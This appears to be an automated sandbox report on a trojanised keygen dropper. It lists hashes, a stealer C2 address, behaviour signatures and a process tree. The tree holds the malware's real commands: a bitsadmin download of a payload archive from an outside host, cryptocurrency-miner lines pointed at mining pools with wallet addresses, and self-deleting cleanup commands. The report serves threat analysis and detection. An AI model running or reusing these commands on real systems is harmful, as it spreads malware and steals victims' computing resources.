Resubmissions

25-04-2021 09:42

210425-v9mttlcxke 10

25-04-2021 08:59

210425-1d89vxfyln 10

25-04-2021 07:37

210425-b8smdccdwe 10

25-04-2021 06:55

210425-1csfnkw57n 10

24-04-2021 20:32

210424-x7kp9rrf4x 10

Analysis

  • max time kernel
    1801s
  • max time network
    1721s
  • platform
    windows10_x64
  • resource
    win10v20210408
  • submitted
    25-04-2021 09:42

General

  • Target

    keygen-step-4 — копия.exe

  • Size

    4.6MB

  • MD5

    563107b1df2a00f4ec868acd9e08a205

  • SHA1

    9cb9c91d66292f5317aa50d92e38834861e9c9b7

  • SHA256

    bf2bd257dde4921ce83c7c1303fafe7f9f81e53c2775d3c373ced482b22eb8a9

  • SHA512

    99a8d247fa435c4cd95be7bc64c7dd6e382371f3a3c160aac3995fd705e4fd3f6622c23784a4ae3457c87536347d15eda3f08aa616450778a99376df540d74d1

Malware Config

Extracted

Family

fickerstealer

C2

sodaandcoke.top:80

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Windows security bypass 2 TTPs
  • fickerstealer

    Ficker is an infostealer written in Rust and ASM.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • XMRig Miner Payload 2 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 44 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of local email clients 2 TTPs

    Email clients store some user data on disk where infostealers will often target it.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks for any installed AV software in registry 1 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 14 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Drops file in Program Files directory 64 IoCs
  • Drops file in Windows directory 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 10 IoCs
  • NSIS installer 2 IoCs
  • Checks SCSI registry key(s) 3 TTPs 24 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
  • Download via BitsAdmin 1 TTPs 1 IoCs
  • Kills process with taskkill 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 4 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 4 IoCs
  • Runs ping.exe 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 10 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s WpnService
    1⤵
      PID:2756
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:2744
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2664
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
        1⤵
          PID:2464
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2432
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
          1⤵
            PID:1904
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s SENS
            1⤵
              PID:1428
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s UserManager
              1⤵
                PID:1324
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s Themes
                1⤵
                  PID:1204
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                  1⤵
                    PID:1076
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:924
                    • C:\Users\Admin\AppData\Roaming\rhesbit
                      C:\Users\Admin\AppData\Roaming\rhesbit
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:5504
                      • C:\Users\Admin\AppData\Roaming\rhesbit
                        C:\Users\Admin\AppData\Roaming\rhesbit
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5700
                    • C:\Users\Admin\AppData\Roaming\bfesbit
                      C:\Users\Admin\AppData\Roaming\bfesbit
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:1160
                    • C:\Users\Admin\AppData\Roaming\rhesbit
                      C:\Users\Admin\AppData\Roaming\rhesbit
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:4536
                      • C:\Users\Admin\AppData\Roaming\rhesbit
                        C:\Users\Admin\AppData\Roaming\rhesbit
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        • Suspicious behavior: MapViewOfSection
                        PID:5040
                    • C:\Users\Admin\AppData\Roaming\bfesbit
                      C:\Users\Admin\AppData\Roaming\bfesbit
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      • Suspicious behavior: MapViewOfSection
                      PID:1268
                    • C:\Windows\system32\rundll32.exe
                      C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\uWObqeM\uWObqeM.dll",uWObqeM
                      2⤵
                      • Windows security modification
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      PID:3868
                    • C:\Users\Admin\AppData\Roaming\rhesbit
                      C:\Users\Admin\AppData\Roaming\rhesbit
                      2⤵
                      • Executes dropped EXE
                      • Suspicious use of SetThreadContext
                      PID:1592
                      • C:\Users\Admin\AppData\Roaming\rhesbit
                        C:\Users\Admin\AppData\Roaming\rhesbit
                        3⤵
                        • Executes dropped EXE
                        • Checks SCSI registry key(s)
                        PID:1464
                    • C:\Users\Admin\AppData\Roaming\bfesbit
                      C:\Users\Admin\AppData\Roaming\bfesbit
                      2⤵
                      • Executes dropped EXE
                      • Checks SCSI registry key(s)
                      PID:4788
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                    1⤵
                      PID:1020
                    • C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe
                      "C:\Users\Admin\AppData\Local\Temp\keygen-step-4 — копия.exe"
                      1⤵
                      • Checks computer location settings
                      • Suspicious use of WriteProcessMemory
                      PID:1456
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\xiuhuali.exe"
                        2⤵
                        • Executes dropped EXE
                        • Drops file in Program Files directory
                        • Suspicious use of SetWindowsHookEx
                        • Suspicious use of WriteProcessMemory
                        PID:200
                        • C:\Windows\SysWOW64\rundll32.exe
                          "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                          3⤵
                          • Loads dropped DLL
                          • Modifies registry class
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of AdjustPrivilegeToken
                          • Suspicious use of WriteProcessMemory
                          PID:3828
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\JoSetp.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:604
                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe
                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                        2⤵
                        • Executes dropped EXE
                        • Suspicious use of WriteProcessMemory
                        PID:1804
                        • C:\Users\Admin\AppData\Local\Temp\is-9JP66.tmp\Install.tmp
                          "C:\Users\Admin\AppData\Local\Temp\is-9JP66.tmp\Install.tmp" /SL5="$60080,235791,152064,C:\Users\Admin\AppData\Local\Temp\RarSFX0\Install.exe"
                          3⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Suspicious use of WriteProcessMemory
                          PID:852
                          • C:\Users\Admin\AppData\Local\Temp\is-19PS6.tmp\Ultra.exe
                            "C:\Users\Admin\AppData\Local\Temp\is-19PS6.tmp\Ultra.exe" /S /UID=burnerch1
                            4⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Adds Run key to start application
                            • Suspicious use of AdjustPrivilegeToken
                            • Suspicious use of WriteProcessMemory
                            PID:3960
                            • C:\Program Files\Windows Media Player\TERTWYAOXY\ultramediaburner.exe
                              "C:\Program Files\Windows Media Player\TERTWYAOXY\ultramediaburner.exe" /VERYSILENT
                              5⤵
                              • Executes dropped EXE
                              • Suspicious use of WriteProcessMemory
                              PID:3724
                              • C:\Users\Admin\AppData\Local\Temp\is-TBFC3.tmp\ultramediaburner.tmp
                                "C:\Users\Admin\AppData\Local\Temp\is-TBFC3.tmp\ultramediaburner.tmp" /SL5="$40050,281924,62464,C:\Program Files\Windows Media Player\TERTWYAOXY\ultramediaburner.exe" /VERYSILENT
                                6⤵
                                • Executes dropped EXE
                                • Drops file in Program Files directory
                                • Suspicious behavior: EnumeratesProcesses
                                • Suspicious use of FindShellTrayWindow
                                • Suspicious use of WriteProcessMemory
                                PID:2256
                                • C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
                                  "C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
                                  7⤵
                                  • Executes dropped EXE
                                  PID:3020
                            • C:\Users\Admin\AppData\Local\Temp\80-8421e-0c2-0e490-60f7ab1c86640\Gejifylavae.exe
                              "C:\Users\Admin\AppData\Local\Temp\80-8421e-0c2-0e490-60f7ab1c86640\Gejifylavae.exe"
                              5⤵
                              • Executes dropped EXE
                              • Checks computer location settings
                              • Suspicious use of AdjustPrivilegeToken
                              PID:3208
                            • C:\Users\Admin\AppData\Local\Temp\6c-2968f-c40-36389-60ff61f9a74f9\Lozhotalyhe.exe
                              "C:\Users\Admin\AppData\Local\Temp\6c-2968f-c40-36389-60ff61f9a74f9\Lozhotalyhe.exe"
                              5⤵
                              • Executes dropped EXE
                              • Suspicious behavior: EnumeratesProcesses
                              • Suspicious use of AdjustPrivilegeToken
                              • Suspicious use of WriteProcessMemory
                              PID:4120
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\33n0x2su.olx\instEU.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4944
                                • C:\Users\Admin\AppData\Local\Temp\33n0x2su.olx\instEU.exe
                                  C:\Users\Admin\AppData\Local\Temp\33n0x2su.olx\instEU.exe
                                  7⤵
                                  • Executes dropped EXE
                                  PID:2912
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\dmuxgia2.1h1\google-game.exe & exit
                                6⤵
                                • Suspicious use of WriteProcessMemory
                                PID:5072
                                • C:\Users\Admin\AppData\Local\Temp\dmuxgia2.1h1\google-game.exe
                                  C:\Users\Admin\AppData\Local\Temp\dmuxgia2.1h1\google-game.exe
                                  7⤵
                                  • Executes dropped EXE
                                  • Drops file in Program Files directory
                                  • Suspicious use of SetWindowsHookEx
                                  • Suspicious use of WriteProcessMemory
                                  PID:5136
                                  • C:\Windows\SysWOW64\rundll32.exe
                                    "C:\Windows\System32\rundll32.exe" "C:\Program Files\install.dll",install
                                    8⤵
                                    • Loads dropped DLL
                                    • Modifies registry class
                                    PID:5264
                              • C:\Windows\System32\cmd.exe
                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ekorsb3p.qce\md1_1eaf.exe & exit
                                6⤵
                                  PID:5476
                                  • C:\Users\Admin\AppData\Local\Temp\ekorsb3p.qce\md1_1eaf.exe
                                    C:\Users\Admin\AppData\Local\Temp\ekorsb3p.qce\md1_1eaf.exe
                                    7⤵
                                    • Executes dropped EXE
                                    PID:5892
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -u -p 5892 -s 4668
                                      8⤵
                                      • Suspicious use of NtCreateProcessExOtherParentProcess
                                      • Drops file in Windows directory
                                      • Program crash
                                      PID:5036
                                • C:\Windows\System32\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bf2j1dqu.j30\y1.exe & exit
                                  6⤵
                                    PID:5992
                                    • C:\Users\Admin\AppData\Local\Temp\bf2j1dqu.j30\y1.exe
                                      C:\Users\Admin\AppData\Local\Temp\bf2j1dqu.j30\y1.exe
                                      7⤵
                                      • Executes dropped EXE
                                      • Loads dropped DLL
                                      PID:4872
                                      • C:\Users\Admin\AppData\Local\Temp\pe4o2I9dSr.exe
                                        "C:\Users\Admin\AppData\Local\Temp\pe4o2I9dSr.exe"
                                        8⤵
                                        • Executes dropped EXE
                                        • Modifies system certificate store
                                        PID:5180
                                        • C:\Users\Admin\AppData\Roaming\1619351265796.exe
                                          "C:\Users\Admin\AppData\Roaming\1619351265796.exe" /sjson "C:\Users\Admin\AppData\Roaming\1619351265796.txt"
                                          9⤵
                                          • Executes dropped EXE
                                          PID:4396
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c ping 127.0.0.1 -n 3 & del "C:\Users\Admin\AppData\Local\Temp\pe4o2I9dSr.exe"
                                          9⤵
                                            PID:6004
                                            • C:\Windows\System32\Conhost.exe
                                              \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                              10⤵
                                                PID:4840
                                              • C:\Windows\SysWOW64\PING.EXE
                                                ping 127.0.0.1 -n 3
                                                10⤵
                                                • Runs ping.exe
                                                PID:5964
                                          • C:\Windows\SysWOW64\cmd.exe
                                            cmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\bf2j1dqu.j30\y1.exe"
                                            8⤵
                                              PID:4240
                                              • C:\Windows\SysWOW64\timeout.exe
                                                timeout /T 10 /NOBREAK
                                                9⤵
                                                • Delays execution with timeout.exe
                                                PID:5336
                                        • C:\Windows\System32\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\qolhdye5.gkb\askinstall39.exe & exit
                                          6⤵
                                            PID:4628
                                            • C:\Users\Admin\AppData\Local\Temp\qolhdye5.gkb\askinstall39.exe
                                              C:\Users\Admin\AppData\Local\Temp\qolhdye5.gkb\askinstall39.exe
                                              7⤵
                                              • Executes dropped EXE
                                              PID:3940
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd.exe /c taskkill /f /im chrome.exe
                                                8⤵
                                                  PID:4540
                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                    taskkill /f /im chrome.exe
                                                    9⤵
                                                    • Kills process with taskkill
                                                    PID:1800
                                            • C:\Windows\System32\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\351qhkbn.b5b\inst.exe & exit
                                              6⤵
                                                PID:1800
                                                • C:\Users\Admin\AppData\Local\Temp\351qhkbn.b5b\inst.exe
                                                  C:\Users\Admin\AppData\Local\Temp\351qhkbn.b5b\inst.exe
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5660
                                              • C:\Windows\System32\cmd.exe
                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\3komfgyy.o5s\SunLabsPlayer.exe /S & exit
                                                6⤵
                                                  PID:6112
                                                  • C:\Users\Admin\AppData\Local\Temp\3komfgyy.o5s\SunLabsPlayer.exe
                                                    C:\Users\Admin\AppData\Local\Temp\3komfgyy.o5s\SunLabsPlayer.exe /S
                                                    7⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    • Drops file in Program Files directory
                                                    PID:4536
                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                      8⤵
                                                        PID:4992
                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                        8⤵
                                                          PID:4464
                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                          8⤵
                                                            PID:1028
                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                            8⤵
                                                              PID:2104
                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                              8⤵
                                                                PID:1008
                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                                8⤵
                                                                  PID:1824
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                                  8⤵
                                                                  • Checks for any installed AV software in registry
                                                                  PID:5628
                                                                • C:\Windows\SysWOW64\bitsadmin.exe
                                                                  "bitsadmin" /Transfer helper http://sunlabsinternational.com/data/data.7z C:\zip.7z
                                                                  8⤵
                                                                  • Download via BitsAdmin
                                                                  PID:5636
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pQGiWRM0rcPUBXqC -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  • Drops file in Program Files directory
                                                                  PID:4884
                                                                • C:\Program Files (x86)\lighteningplayer\data_load.exe
                                                                  "C:\Program Files (x86)\lighteningplayer\data_load.exe" -pA4ibSiETYDLITxK -y x C:\zip.7z -o"C:\Program Files\temp_files\"
                                                                  8⤵
                                                                  • Executes dropped EXE
                                                                  PID:5488
                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                                  8⤵
                                                                    PID:4464
                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                                    8⤵
                                                                      PID:4732
                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                                      8⤵
                                                                        PID:5228
                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                                        8⤵
                                                                          PID:4460
                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                                          8⤵
                                                                            PID:5244
                                                                          • C:\Windows\SysWOW64\rundll32.exe
                                                                            C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWObqeM\uWObqeM.dll" uWObqeM
                                                                            8⤵
                                                                            • Loads dropped DLL
                                                                            PID:5784
                                                                            • C:\Windows\system32\rundll32.exe
                                                                              C:\Windows\System32\rundll32.exe "C:\Program Files (x86)\uWObqeM\uWObqeM.dll" uWObqeM
                                                                              9⤵
                                                                              • Loads dropped DLL
                                                                              • Drops file in System32 directory
                                                                              • Drops file in Program Files directory
                                                                              PID:5132
                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                                            8⤵
                                                                              PID:5196
                                                                              • C:\Windows\System32\Conhost.exe
                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                9⤵
                                                                                • Executes dropped EXE
                                                                                • Modifies data under HKEY_USERS
                                                                                PID:4712
                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                                              8⤵
                                                                                PID:5996
                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                                                8⤵
                                                                                  PID:5908
                                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                                                  8⤵
                                                                                    PID:2876
                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nse35D8.tmp\tempfile.ps1"
                                                                                    8⤵
                                                                                      PID:5624
                                                                                    • C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe
                                                                                      "C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      • Loads dropped DLL
                                                                                      • Drops file in Program Files directory
                                                                                      PID:5288
                                                                                • C:\Windows\System32\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\rkekopgb.len\GcleanerWW.exe /mixone & exit
                                                                                  6⤵
                                                                                    PID:4732
                                                                                  • C:\Windows\System32\cmd.exe
                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\mariog1q.zox\toolspab1.exe & exit
                                                                                    6⤵
                                                                                      PID:5392
                                                                                      • C:\Users\Admin\AppData\Local\Temp\mariog1q.zox\toolspab1.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\mariog1q.zox\toolspab1.exe
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of SetThreadContext
                                                                                        PID:5988
                                                                                        • C:\Users\Admin\AppData\Local\Temp\mariog1q.zox\toolspab1.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\mariog1q.zox\toolspab1.exe
                                                                                          8⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:5776
                                                                                    • C:\Windows\System32\cmd.exe
                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\l4wdgzti.hr1\c7ae36fa.exe & exit
                                                                                      6⤵
                                                                                        PID:4840
                                                                                        • C:\Users\Admin\AppData\Local\Temp\l4wdgzti.hr1\c7ae36fa.exe
                                                                                          C:\Users\Admin\AppData\Local\Temp\l4wdgzti.hr1\c7ae36fa.exe
                                                                                          7⤵
                                                                                          • Executes dropped EXE
                                                                                          • Loads dropped DLL
                                                                                          • Checks SCSI registry key(s)
                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                          PID:5524
                                                                                      • C:\Windows\System32\cmd.exe
                                                                                        "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\azefecvs.g4h\app.exe /8-2222 & exit
                                                                                        6⤵
                                                                                          PID:5860
                                                                                          • C:\Users\Admin\AppData\Local\Temp\azefecvs.g4h\app.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\azefecvs.g4h\app.exe /8-2222
                                                                                            7⤵
                                                                                            • Executes dropped EXE
                                                                                            PID:5756
                                                                                            • C:\Users\Admin\AppData\Local\Temp\azefecvs.g4h\app.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\azefecvs.g4h\app.exe" /8-2222
                                                                                              8⤵
                                                                                                PID:4712
                                                                                  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                    2⤵
                                                                                    • Executes dropped EXE
                                                                                    • Modifies system certificate store
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:4236
                                                                                    • C:\Users\Admin\AppData\Roaming\F3AC.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\F3AC.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4988
                                                                                      • C:\Users\Admin\AppData\Roaming\F3AC.tmp.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\F3AC.tmp.exe"
                                                                                        4⤵
                                                                                        • Executes dropped EXE
                                                                                        • Checks processor information in registry
                                                                                        PID:5652
                                                                                    • C:\Users\Admin\AppData\Roaming\F6F9.tmp.exe
                                                                                      "C:\Users\Admin\AppData\Roaming\F6F9.tmp.exe"
                                                                                      3⤵
                                                                                      • Executes dropped EXE
                                                                                      • Adds Run key to start application
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4956
                                                                                      • C:\Windows\system32\msiexec.exe
                                                                                        -P stratum1+ssl://0xb7633a80145Ec9ce2b8b5F80AB36C783064C2E10.w19901@eu-eth.hiveon.net:24443 -R --response-timeout 30 --farm-retries 99999
                                                                                        4⤵
                                                                                          PID:5380
                                                                                        • C:\Windows\system32\msiexec.exe
                                                                                          -o pool.supportxmr.com:8080 -u 47wDrszce6VbnMB4zhhEA1Gr3EzwHx2eS6QzC5sFoq8iGdMjnzX8bnEjBdQHsAuW8C1SNgxyGa4DQTVnQ9jfhRod73np5P8.w1341 --cpu-max-threads-hint 50 -r 9999
                                                                                          4⤵
                                                                                          • Blocklisted process makes network request
                                                                                          PID:6008
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        "C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\RarSFX0\filee.exe"
                                                                                        3⤵
                                                                                          PID:5404
                                                                                          • C:\Windows\SysWOW64\PING.EXE
                                                                                            ping 127.0.0.1
                                                                                            4⤵
                                                                                            • Runs ping.exe
                                                                                            PID:5268
                                                                                      • C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe
                                                                                        "C:\Users\Admin\AppData\Local\Temp\RarSFX0\jg6_6asg.exe"
                                                                                        2⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:1968
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 4576
                                                                                          3⤵
                                                                                          • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                          • Program crash
                                                                                          PID:4392
                                                                                    • \??\c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s BITS
                                                                                      1⤵
                                                                                      • Suspicious use of SetThreadContext
                                                                                      • Suspicious behavior: EnumeratesProcesses
